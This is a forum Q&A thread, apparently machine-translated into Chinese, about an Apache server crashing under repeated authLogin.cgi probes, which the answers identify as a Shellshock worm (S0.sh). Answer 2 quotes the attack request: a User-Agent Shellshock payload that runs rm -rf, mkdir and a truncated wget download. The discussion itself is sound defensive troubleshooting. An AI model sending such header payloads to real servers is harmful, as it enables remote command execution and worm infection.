Apache http 服务器已停止工作

Question

朋友们好，

我在 windows server datacenter 中使用带有 php 5.3.29 的 Ampps 服务器。

不幸的是，我在 windows 服务器和我的网站中收到以下提示。

提示标题： 微软视窗

提示信息： Apache http 服务器已停止工作。

一个问题导致程序停止正常工作。 windows 将关闭程序并通知您是否有可用的解决方案。

追踪：

当我跟踪错误和访问日志时，我发现以下日志是原因。

在 Apache 访问日志中：

202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] “GET /cgi-bin/authLogin.cgi HTTP/1.1”404 1335 209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] “GET /cgi-bin/authLogin.cgi HTTP/1.1”404 1335 81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335

在 Apache 错误日志中：

[2014 年 12 月 10 日星期三 07:25:04.401073] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] 找不到脚本或无法统计：D:/Program Files/Ampps/ www/cgi-bin/authLogin.cgi

请帮帮我。

Answer 1

我不认为 authLogin.cgi 真的很重要，只是它可能允许某人执行。问题是用户尝试或成功删除 /tmp/S0.sh 并在共享文件夹中创建目录 php 然后执行 wget。

/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

经过这么长时间的思考之后，出现了以下问题： http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

“S0.sh 由两个主要部分组成……第一部分进行初始设置并下载附加程序，然后第二部分安装蠕虫并执行一些附加命令。”

因此，捕捉这个动作是一种真正的享受，最初没有人知道将其称为 Shellshock。那里有一个 S0.sh 的副本，你可以看到它是一个蠕虫，我猜是这种情况。

根据我的阅读，蠕虫只是浏览 IP 空间，寻找监听 8080 端口的人。

Answer 2

有一个 Web bot 试图获得授权，因此它可以 wget 并执行类似 S0.py 的东西，我认为这是一个蠕虫，因此下载服务器受到了威胁。 如果你碰巧得到一份 S0.sh 的副本，我想把它交给exploit-db 或类似的东西。 聪明的命令是： 获取 /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

文件在下载后执行。 我想有一些关于 HDB_DATA 的东西，我什至没有。 “信息至上！”

Answer 3

最后我拒绝了那些客户端访问 cgi-bin 目录。

在 cgi-bin 目录中我创建了一个 .htaccess 文件

我在 .htaccess 中添加了以下行

拒绝所有人。

Answer 4

如果您尝试打开此文件，会发生什么情况？

D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

消息表明文件不存在，如 404 错误和消息“未找到脚本”所示。